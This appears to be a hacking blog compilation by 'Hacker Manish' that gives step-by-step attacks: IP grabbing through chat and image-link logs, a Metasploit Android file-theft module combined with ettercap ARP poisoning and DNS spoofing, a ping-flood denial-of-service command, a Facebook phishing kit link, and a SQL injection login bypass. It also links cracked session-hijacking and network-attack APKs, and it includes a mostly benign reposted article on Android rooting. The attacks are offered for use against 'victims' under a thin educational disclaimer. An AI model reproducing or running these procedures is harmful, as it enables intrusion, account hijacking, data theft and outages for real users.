Below are two method for how to find
ip addresses of targeted user
If you want to check for ip address
of particular person on facebook or orkut or any other social site just invite
them for a chat, so that your browser should connect to that system, than only
when chat is ON open command prompt type the below command
Netstat –an
This will show you the connected ip addresses, than from shown ip addresses search for suspicious ip address that is not the local connection address.
Local connections are normally starts from 192.168.1.1 ranging to 192.168.1.255
Netstat –an
This will show you the connected ip addresses, than from shown ip addresses search for suspicious ip address that is not the local connection address.
Local connections are normally starts from 192.168.1.1 ranging to 192.168.1.255
Other netstat commands:
-a Displays all connections
and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
-p option may be used to specify a subset of the default.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP.
-s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the
-p option may be used to specify a subset of the default.
Another method for obtaining ip
address
Firstly create a online hosting
account for free. Now upload any file on it such as a image. Send the image
link to your friend as orkut scrap or facebook message or as any other method
your want. once the user will go through that image link, a file named log.txt
will be generated by hosting server and will be saved nearby your uploaded
file.
This log.txt file will be containing ip address of the user who opened it from the sent link.
This log.txt file will be containing ip address of the user who opened it from the sent link.
Now what an ip address can do for
you. An ip address can be very useful to you. As with ip address you can trace
the location of victims system. ip address is useful in many types of hacking.
With an ip address open port (searching for open port) can be searched, through which you can gain access to targeted computer and do whatever you want on it to (system hacking with open port)
With an ip address open port (searching for open port) can be searched, through which you can gain access to targeted computer and do whatever you want on it to (system hacking with open port)
+++++++hacker manish++++++++++
A quick guide on how to steal data
from an android device (smart phones, tablets etc) on your network. We will be
using metasploit to launch the Android content provider file disclosure
module. Next we will use ettercap to do dns spoofing through arp poisoning.
I will be giving a brief explanation
on how to set up the attack as i do not have any sophisticated victim scenario
set up. This will work on Android 2.2 or earlier, i have not done any test on
other versions, lets see if we can get any free test subjects today. You may
download the PDF version of this tutorial here.
Description
The Android content provider file disclosure module exploits a cross domain issue within the Android web browser to ex-filtrate files from a vulnerable device.
The Android content provider file disclosure module exploits a cross domain issue within the Android web browser to ex-filtrate files from a vulnerable device.
Lets Begin
1) Load up a terminal and type:
msfconsole.
2) Next type : search android.
3) As shown in the image below, we
have two matching modules.
4) For this tutorial we are going to
use the first module. Type : info auxiliary/gather/android_htmlfileprovider.
5) Lets go through the
important options that we must know.
a) FILE – If you have a particular
location to steal a file from, this is where you redirect it. By default the
auxiliary will steal the file from /proc/version,/proc/self/status,/data/system/packages.list.
b) SRVHOST – This is where you fill
in your (attacker) IP address.
c) SRVPORT – By default this
launches the auxiliary on port 8080.
d) URIPATH – By default this creates
a random sub-link for your exploit. For example: http://192.168.1.47/fhsduhs.
You can change it to anything you think that might help your attack, eg:
http://192.168.1.47/wholovesjames.
6) Since i am not setting up a more
sophisticated attack, i will leave the SSL options alone. This should do for
now.
7) To use this module, type :
use auxiliary/gather/android_htmlfileprovider.
8) set SRVHOST (Your Ip)
9) set SRVPORT 80 (I am setting this
to 80 so it will be simpler to set up the dns spoofing later.)
10) set URIPATH / and finally type:
exploit.
11) Ok so we have successfully
launched the auxiliary. You can now take the link
“http://192.168.1.47:80″ and give this to a friend using an Android
device who is in the same network as you. Too much trouble , i know. So
lets do some dns spoofing through arp poisoning with ettercap.
12) Open up another terminal screen
(Ctrl-Shift T). Type : locate etter.dns.
13) Next type : nano (etter.dns).
14) As shown in the image below, i
have decided to spoof facebook.com and i have redirected facebook.com to my ip
address. Save it when you are done.
15) For a change lets launch
ettercap through our terminal, type : ettercap -i wlan0 -T -q -P dns_spoof -M
ARP:remote // //.
16) So set up is complete! Now when
anyone on your network using an Android (vulnerable version) attempts to visit
facebook.com, they will be redirected to your IP address. This does a mass
attack on the network, so other users will be affected by the dns spoofing as
well. In the real scenario, you will need to direct the attack to one specific ip
address.
17) Once the android users loaded
the malicious url, my terminal starts loading.
18) Sadly they were using version 4
and above which obviously is not vulnerable to this attack. As mentioned above,
i believe this works on version 2.2 and below.
19) If!!! there were vulnerable
Android users on the network, we would be able to steal data from their phone
memory card etc. Also remember the set FILE option is where you direct the file
to steal.
Remember metaspoit is available on
backtrack 5
And bt5 is available on Droid
And bt5 is available on Droid
************HACKER MANISH***********
Remember friends this is purely for
educational purposes, please please please don't use this for illegal
activities... Don't use it to harm any Server or site.
DDoS Attack:
Distributed denial-of-service attack
(DDOS attack) is an attempt to make a computer resource unavailable to its
intended users. One common method of attack involves sending an enormous amount
of request to Server or site and server will be unable to handle the requests
and site will be offline for some days or months depending upon the strength of
Attack i.e. (Data Sent to the Site/Server)
Basic Procedure/Logic employed in
DDOS :
1.) Open Command Prompt in windows
by going to Start -> All Programs -> Accessories -> Command Prompt.
2.) Type "ping site-ip -l 5120
-n 100000 -w 1".
Here "site-ip" is the IP
Address of Target, You can also use site-name like "www.google.com"
instead of site-ip."5120" is the size of packet sent to the target
Which is 5 KB in example."100000" is the no of requests sent to the
Target. "- w 1" is the waiting time after each request which is 1 sec
in example. You can change these parameters according to your need, but don't
omit these.
This Attack is also called
"Ping of Death"
But In Actual a Single Computer
using this Attack cannot Deface a Site for long time. Hackers Create and
install botnets on different computers as trojans and use those Comprised
Computers also to send these Dummy Packets to Target. When a Large no of
Compromised Computer send simultaneous Requests to the target, the target site
will be offline and defaced.
If you like this article don't
forget to give my blog a great interest ... Keep reading my articles and learn
Ethical Hacking.
***********HACKER MANISH***********
http://f06.wapkafiles.com/download/0/f/9/261575_0f923c1d68588e90384f9964e30a.zip/4a6de0d6471d83a15815/Facebook%2Bmobile%2Bphisher%2Bsource%2Bcode%2B%26%2Bscreen%2Bshots.zip
Upload them on wapka.com <br>
Instruction inside the .rar file
Instruction inside the .rar file
HACK you ANDROID LIKE A PRO {FULL TUTORIAL]
There are benefits to rooting your Android smartphone, but it can be a tricky world for beginners. Here are some tips.Rooting an Android phone opens the door to new possibilities.
Scott Webster/CNET
For all of the flexibility and customization that comes with an Android device, there are still plenty of restrictions in place. While Android technically is an open-source platform, the final product is still the result of a phone-maker's skin, the carrier or manufacturer's preloaded software, or even sometimes, a few disabled features.
Related stories
There isn't anything wrong with most out-of-the-box experiences, but more daring and tech-savvy users who tire of being at the mercy and discretion of carriers and handset makers might be interested in pushing their Android devices to new limits. This is where the practice known as rooting comes into play.
Around since the early days of the T-Mobile G1 (HTC Dream), rooting can add functionality to a phone and often extend the life of the device. The T-Mobile G1, for instance, was officially supported through Android 1.6 Donut, but if you rooted the phone, you could load an alternative developer-made version of the OS that offered most of Android 2.2 Froyo's features.
I'm going to share some of rooting's benefits and risks, where to find some great replacements for the default Android OS, and a few other tips. If you have any of your own that I haven't covered here, please add them to the comments below.
What is rooting?
Rooting, in a nutshell, is the process that provides users with full administrator control and access to an Android smartphone or tablet. Similar to "jailbreaking" an iOS device, this is often done in order to bypass carrier or handset maker limitations or restrictions. Once you achieve "root access," you can replace or alter applications and system settings, run specialized apps, and more.
One of the more common reasons to root a phone is to replace the operating system with a ROM, another developer's version of the OS that also gives you more control over details. In rooting culture, we'd call that "flashing a custom ROM."
The process of rooting an Android phone varies for each device, but seems to have been streamlined over time. Google's Nexus line of phones, such as the LG-made Nexus 4, appeals to developers and techie types and are among the most often rooted models. With that in mind, you'll also find that popular devices like the Samsung Galaxy S3 and HTC One X+ have plenty of custom ROMs to choose from.
Note that rooting will void the device warranty; however, flashing a stock ROM can revert things back to their original state.
Why root?
There are multiple reasons for you to consider rooting your Android handset, some more obvious than others. Chief among the benefits is the ability to remove any unwanted apps and games that your carrier or phone maker installs before you ever unwrap your phone. Rather than simply disabling these bloatware titles, which is often the best you can do within Android, rooting can grant you a full uninstallation. Deleting apps you'll never use can also free up some additional storage capacity.
Another main benefit of rooting is to enable faster platform updates. From the time it takes for Google to announce a new version of Android to the time your carrier pushes it to your device can be on the order of weeks, months, or even longer. Once rooted, you can often get some of the new platform features through custom ROMs in short order. This could, for some users, add years of life to an Android handset -- rather than buy a new phone, flash a new ROM.
Other reasons to root a phone include being able to perform complete device backups, integrate tethering and mobile hot-spot features, and extend the device's battery life through newfound settings and controls.
What are the risks?
As I mentioned above, rooting your device can void your warranty. This is perhaps the biggest risk associated with playing around with your phone. If you run into big trouble and you've added a custom ROM build, your manufacturer and carrier likely won't help you out.
In most cases, you'll be able to overturn any ROM you flash, returning to the phone's stock Android OS with as much ease as you installed the new ROM in the first place. However, a word of caution. If you're not careful, or don't follow the steps properly, you could end up with a glorified paperweight. Yes, I'm talking about "bricking" your device. It's vitally important that you exercise caution when attempting to root your phone and pay close attention to what you're doing.
Stick to the more reputable sources for help and feedback, and look for the most recent news about ROMs and your particular Android device. Along those lines, you'll also want to ensure that you read through everything you can before starting down this road. If you're in a forum thread, skim the replies to see if there are issues or problems with your particular handset.
Helping hands
For help with rooting, I would first recommend XDA developers, AndroidCentral forums, Androidforums, and Rootzwiki. I also suggest checking Google+ as a good source for rooting and modding news and feedback. The rooting scene is not some secret underground Fight Club; you'll find plenty of documented help for rooting your phone. Filter your results by date, read through the details, and understand what it is you are about to do.
CyanogenMod is one of the oldest and feature-rich ROMs available.
CyanogenMod
More about ROMs
For all practical purposes, (custom) ROMs are replacement firmware for Android devices that provide features or options not found in the stock OS experience. Often built from the official files of Android or kernel source code, there are more than a few notable ROMs to consider. Among the more popular custom ROMs are CyanogenMod, Paranoid Android, MIUI, and AOKP (Android Open Kang Project). There are, of course, countless others to check out, with more arriving almost daily.
In terms of sheer support and development, CyanogenMod is the clear leader in this field. The number of supported devices is unparalleled and the community has long rallied around this ROM. This is not meant to say that it's necessarily the "best" ROM; beauty is in the eye of the beholder.
Closely resembling the stock Android experience, CyanogenMod has been known to introduce features that later end up in official builds of Android. As of today there are more than 4.2 million active installations of CyanogenMod releases, with v10.1 (based on Android 4.2 Jelly Bean) being the latest.
Paranoid Android is one of the more popular custom ROMs for Android.
Paranoid Android
Where to look for ROMs
Forums are going to be a great place to keep yourself plugged in, but the larger ROM developers will provide their own Web sites. Aside from the aforementioned custom ROMs, others that have gained a strong following include SynergyROM, Slim Bean, LiquidSmooth, RevoltROM, and Xylon. Be warned: talking about ROMs can often result in heated debate as to which is better or offers more options.
Noteworthy apps
Aside from installing custom ROMs, rooting your phone opens the door to installing new apps and gaining extended device management and security functionality beyond what comes with the usual Android OS experience.
Should you decide to not load a new ROM interface, you can still install apps that add new levels of functionality to your rooted Android phone. Today's more popular titles include ROM Toolbox Pro, Titanium Backup, Touch Control, Cerberus anti-theft, and SetCPU. The appeal of each will vary depending upon on how much you want to tweak your Android experience.
For those of you who plan to flash ROMs on a regular basis, I recommend starting with ROM Manager. This utility lets users manage backups and recoveries, install ROMs, and other handy functions. While it is available as a free app, the premium client has ROM update notifications, nightly ROM downloads, set automatic backups, and other features.
ROM Toolbox Pro is a handy utility for rooted users.
JRummy Apps
Backup plans
When it comes to rooting your phone, it is always a good idea to have backup plans in place. After all, you'll need something to fall back on should you run into an issue with an untested or experimental ROM. While Titanium Backup seems to be the most popular, Carbon has gained quite a fan base of late. Regardless of which route you take, it's important to create a backup and test it before you apply a custom ROM.
Become familiar with the process and make sure that you'll be able to restore things in the event of a catastrophe. It might take some practice and you could spend more time than you'd like creating this backup, but it could be all that stands between you and expensive phone repair.
Indeed, there is plenty to consider when it comes to rooting your Android phone. Rest assured, though, that no matter how daunting the task might seem, there's a large community of users out there who will have your back. And while the actual rooting process varies with each handset model, on the whole, it isn't as difficult as it may sound.
If you've read through this post and still don't know if rooting is for you, my suggestion is to give it more time and mull it over. Replacing the default Android OS certainly isn't for everyone and there's quite a bit more on the topic besides. For many people, myself included, the rewards of tweaking your Android phone to have it exactly the way you want it are worth the risk.
Do you have any adventures in rooting and ROMs? Share them in the comments.
++++++hacker manish+++++++++++
TOP ANDROID HACKING TOOLS TO TURN YOUR SMARTPHONE INTO HACKING DEVICE (volume 2)
This is hacker Manish android hacking tools volume 2NOTE: YOU NEED ROOT FOR THESE APPS!!
First off I am going to cover the basics on covering your tracks and network discovery.
Mac Address Spoofing:
MacAddress - This app lets you change your wifi Mac Address. It is no longer availabe ANYWHERE! I uploaded the APP here for HF -
http://www.4shared.com/android/ywLduiR4/...ss_10.html
Network Mapping:
Network Mapper - This tool lets you scan a network for live hosts and check for open ports.
https://market.android.com/details?id=or...rch_result
Packet Sniffing (Non-Intrusive) :
Shark for Root & Shark Reader - Shark is a popular port (or simular) to WireShark (Based of TCPDUMP). It lets you log network traffic and analyze it on your device!
This is the logger:
https://market.android.com/details?id=lv.n3o.shark&feature=search_result
This is to read the logs:
https://market.android.com/details?id=lv..._developer
Now time for the GOOD STUFF!!!
Below are some of the best hacking apps for android. Real hacking apps! In my opinion these are a lot more effective than most Linux apps!
Session Hijackers:
Faceniff - Pwning Facebook was never so easy! This is by far one of my favorite apps! Faceniff is a Session Hijacker like Firesheep or hamster/ferret but BETTER. No more need to use cain and able and firesheep to hijack. Also who would suspect a cell phone as a hacking tool? Faceniff will sniff the network and display active sessions and Hijack them! It can hijack the following -
Youtube
Amazon
VKontakte
Tumblr
MySpace
Tuenti
MeinVZ/StudiVZ
blogger
Nasza-Klasa
It is a paid app but here is a cracked versions. just install and enter any activation code and bam!
http://search.4shared.com/q/1/faceniff
My other favorite Hijacking app is:
Droid Sheep - Droid sheep does the same as above and the author is working on SSL Stripping as well! I personally prefer this over Faceniff! Get it here:
http://droidsheep.de/
Finally the ULTIMATE android hacking tool and a special treat for you guys as it is still in beta I am going to leak my APK here!
ANTI - AKA: Android Network Tool Kit. Anti can do a LOT! Here is the description from the website:
[+] Scan - This will scan the selected target for open ports and vulnerabilities, also allowing the user to select a specific scanning script for a more advanced/targeted scan.
[+] Spy - This will 'sniff' images transferred to/from the selected device and display them on your phone in a nice gallery layout. If you choose a network subnet/range as target, then all images transferred on that network - for all connected devices - will be shown. Another feature of the Spy plugin is to sniff URLs (web sites) and non-secured (ie, not HTTPS) username/passwords logins, shown on the bottom drawer.
[+] D.O.S - This will cause a Denial Of Service (D.O.S) for the selected target, ie. it will deny them any further access to the internet until you exit the attack.
[+] Replace images - This will replace all images transferred to/from the target with an Anti logo, thus preventing from attacked used seeing any images on their browsers while the browse the internet, except for a nice looking Anti logo...
[+] M.I.T.M - The Man In The Middle attack (M.I.T.M) is an advanced attack used mainly in combination with other attack. It allows invoking specific filters to manipulate the network data. Users can also add their own mitm filters to create more mitm attacks.
[+] Attack - This will initiate a vulnerability attack using our Cloud service against a specific target. Once executed successfully, it will allow the attack to control the device remotely from your phone.
[+] Report - This will generate a vulnerability report with findings, recommendations and tips on how to fix found vulnerabilities or bad practices used.
Anti supports & uses the followings OSS tools :
nmap
Ettercap
driftnet
THC-Hydra
Metasploit
We will be releasing patch sets for OSS shortly. This should assist developers to compile binaries used by Anti!
MY REVIEW:
Anti Can Steal SSL Encrypted logins (GMAIL ETC), Anti uses driftnet to spy on images a slave computer is viewing, Anti Can Brute Force passwords and even remote exploit a computer using metasploit! Anti also uses nmap to map targets and uses OS Detection! Not to mention anti has the ability to DOS a network. The only downside is that if you want to use a Metasploit hackable computer you need to buy credits however everything else works! I hosted so it stays live.
Here is the leak of my beta apk
http://www.4shared.com/android/qRlvnG_2/Anti10.html
Finally I have one more cool apk!
WifiKill: This is a simple Denial Of Service App. It will let you either completely freeze a users Internet access or DOS the whole network! Here is the app (Also Unreleased Beta)
: http://www.4shared.com/android/gA7J6pdY/...ll-13.html
Conclusion: I hope you guys enjoy this thread and find these tools useful. I am pretty sure this is why android is a growing hacking platform. Best of all no computers necessary. True mobile hacking.
Do share this blog to encourage us since this is new blog we are trying our level best to keep you updated
*************HACKER MANISH********
If you have basic HTML and JavaScript knowledge, you may be
able to access password protected websites. This article will give you an easy
method to hack simple, less-secured websites of your choice simply through
HTML. Use it responsibly. Note: This basic method works only for websites with
extremely low security barriers. Websites with robust security details will not
be susceptible to this kind of simple attack. Here are the steps 1 Open the site
you want to hack. Provide wrong username/password combination in its log in
form. (e.g. : Username : me and Password: ' or 1=1 --)An error will occur
saying wrong username-password. Now be prepared your experiment starts from
here. 2 Right click anywhere on that error page =>> go to view source. 3
There you can see the HTML coding with JavaScript.• There you find somewhat
like this....<_form action="...Login....">• Before this login
information copy the URL of the site in which you are. (e.g. :"<
_form..........action=http://www.targetwebsite.com/login.......>") 4
Then delete the JavaScript from the above that validates your information in
the server.(Do this very carefully, your success to hack the site depends upon
this i.e. how efficiently you delete the java scripts that validate your
account information) 5 Then take a close look for "<_input
name="password" type="password">"[without quotes]
-> replace "<_type=password>" with "<_type=text>".
See there if maximum length of password is less than 11 then increase it to 11
(e.g. : if then write ) 6 Just go to file => save as and save it anywhere in
your hard disk with ext.html(e.g.: c:\chan.html) 7 Reopen your target web page
by double clicking 'chan.html' file that you saved in your hard disk earlier.• You
see that some changes in current page as compared to original One. Don't worry.
8 Provide any username [e.g.: hacker] and password [e.g.:' or 1=1 --] You have
successfully cracked the above website and entered into the account of List
user saved in the server's database *************H@CKER MANISH****
No comments:
Post a Comment